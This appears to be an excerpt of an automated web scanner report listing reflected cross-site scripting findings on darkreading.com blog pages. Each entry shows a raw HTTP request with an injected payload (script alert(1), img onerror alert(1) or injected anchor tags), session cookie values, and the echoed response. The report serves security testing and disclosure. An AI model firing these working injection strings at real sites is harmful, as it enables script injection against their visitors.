The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2a55'><img%20src%3da%20onerror%3dalert(1)>afc3d5dad04 was submitted in the REST URL parameter 3. This input was echoed as c2a55'><img src=a onerror=alert(1)>afc3d5dad04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.htmlc2a55'><img%20src%3da%20onerror%3dalert(1)>afc3d5dad04 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bd6a"><a>336c30562b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html1bd6a"><a>336c30562b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Embedded ...[SNIP]... an-mean-embedded-vulnerabilities.html1bd6a%22%3E%3Ca%3E336c30562b&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html1bd6a"><a>336c30562b"> ...[SNIP]...
3.246. http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfae"><script>alert(1)</script>3faffb1ab32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html?4bfae"><script>alert(1)</script>3faffb1ab32=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c015"><a>e27f48a9bb6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277007671c015"><a>e27f48a9bb6/protecting-ssh-from-the-masses.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98375"><a>0376f620246 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.html98375"><a>0376f620246 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c92cc'><img%20src%3da%20onerror%3dalert(1)>40ae49939b8 was submitted in the REST URL parameter 3. This input was echoed as c92cc'><img src=a onerror=alert(1)>40ae49939b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.htmlc92cc'><img%20src%3da%20onerror%3dalert(1)>40ae49939b8 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a63d9"><script>alert(1)</script>07686a3153c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.html?a63d9"><script>alert(1)</script>07686a3153c=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ddd1"><a>68737eaed8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277007952ddd1"><a>68737eaed8b/there-s-a-recipe-for-that.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1528"><a>d8790268ec9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700795/there-s-a-recipe-for-that.htmla1528"><a>d8790268ec9 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a40f'><img%20src%3da%20onerror%3dalert(1)>541884546d7 was submitted in the REST URL parameter 3. This input was echoed as 4a40f'><img src=a onerror=alert(1)>541884546d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700795/there-s-a-recipe-for-that.html4a40f'><img%20src%3da%20onerror%3dalert(1)>541884546d7 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>There's A ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html4a40f'><img src=a onerror=alert(1)>541884546d7'> ...[SNIP]...
3.254. http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/227700795/there-s-a-recipe-for-that.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e15"><script>alert(1)</script>4ceb75b613c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700795/there-s-a-recipe-for-that.html?38e15"><script>alert(1)</script>4ceb75b613c=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>There's A ...[SNIP]... -recipe-for-that.html%3F38e15%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4ceb75b613c%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html?38e15"><script>alert(1)</script>4ceb75b613c=1"> ...[SNIP]...
3.255. http://www.darkreading.com/blog/227700800/security-s-top-4-social-engineers-of-all-time.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3970"><script>alert(1)</script>a342622570b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700800/security-s-top-4-social-engineers-of-all-time.html?b3970"><script>alert(1)</script>a342622570b=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ff7b"><a>ca4efdb6016 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277008261ff7b"><a>ca4efdb6016/taking-usb-attacks-to-the-next-level.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3836'><img%20src%3da%20onerror%3dalert(1)>b3c8bd6678a was submitted in the REST URL parameter 3. This input was echoed as e3836'><img src=a onerror=alert(1)>b3c8bd6678a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.htmle3836'><img%20src%3da%20onerror%3dalert(1)>b3c8bd6678a HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5f2"><a>cb6b769c644 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.htmlcf5f2"><a>cb6b769c644 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Taking US ...[SNIP]... 700826%2Ftaking-usb-attacks-to-the-next-level.htmlcf5f2%22%3E%3Ca%3Ecb6b769c644&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.htmlcf5f2"><a>cb6b769c644"> ...[SNIP]...
3.259. http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf00"><script>alert(1)</script>94fc87cc10c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.html?caf00"><script>alert(1)</script>94fc87cc10c=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91090"><a>49796f5fff6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770083091090"><a>49796f5fff6/detection-and-defense-of-windows-autorun-locations.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3c98'><img%20src%3da%20onerror%3dalert(1)>6a346b599e3 was submitted in the REST URL parameter 3. This input was echoed as f3c98'><img src=a onerror=alert(1)>6a346b599e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.htmlf3c98'><img%20src%3da%20onerror%3dalert(1)>6a346b599e3 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe004"><a>aa13ea4dc8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.htmlfe004"><a>aa13ea4dc8e HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Detection ...[SNIP]... se-of-windows-autorun-locations.htmlfe004%22%3E%3Ca%3Eaa13ea4dc8e&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.htmlfe004"><a>aa13ea4dc8e"> ...[SNIP]...
3.263. http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c69"><script>alert(1)</script>6c14533190f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.html?61c69"><script>alert(1)</script>6c14533190f=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c13"><a>ee3e558c789 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770083273c13"><a>ee3e558c789/make-security-about-security-not-compliance.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f05af'><img%20src%3da%20onerror%3dalert(1)>e3cd043ab65 was submitted in the REST URL parameter 3. This input was echoed as f05af'><img src=a onerror=alert(1)>e3cd043ab65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700832/make-security-about-security-not-compliance.htmlf05af'><img%20src%3da%20onerror%3dalert(1)>e3cd043ab65 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d07bc"><a>561a5bd8b2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700832/make-security-about-security-not-compliance.htmld07bc"><a>561a5bd8b2b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Make Secu ...[SNIP]... security-about-security-not-compliance.htmld07bc%22%3E%3Ca%3E561a5bd8b2b&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.htmld07bc"><a>561a5bd8b2b"> ...[SNIP]...
3.267. http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3167a"><script>alert(1)</script>71a55e6c014 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700832/make-security-about-security-not-compliance.html?3167a"><script>alert(1)</script>71a55e6c014=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72025"><a>d646fd5dfe9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770083572025"><a>d646fd5dfe9/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a875"><a>cf40ef053cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html7a875"><a>cf40ef053cf HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c46ad'><img%20src%3da%20onerror%3dalert(1)>9d295ab7983 was submitted in the REST URL parameter 3. This input was echoed as c46ad'><img src=a onerror=alert(1)>9d295ab7983 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.htmlc46ad'><img%20src%3da%20onerror%3dalert(1)>9d295ab7983 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>That Was ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.htmlc46ad'><img src=a onerror=alert(1)>9d295ab7983'> ...[SNIP]...
3.271. http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e845"><script>alert(1)</script>e8d5933a3a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html?3e845"><script>alert(1)</script>e8d5933a3a6=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47536"><a>6cfad28f1ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770084547536"><a>6cfad28f1ca/ways-to-slow-an-attacker.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af48"><a>1d76de72611 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
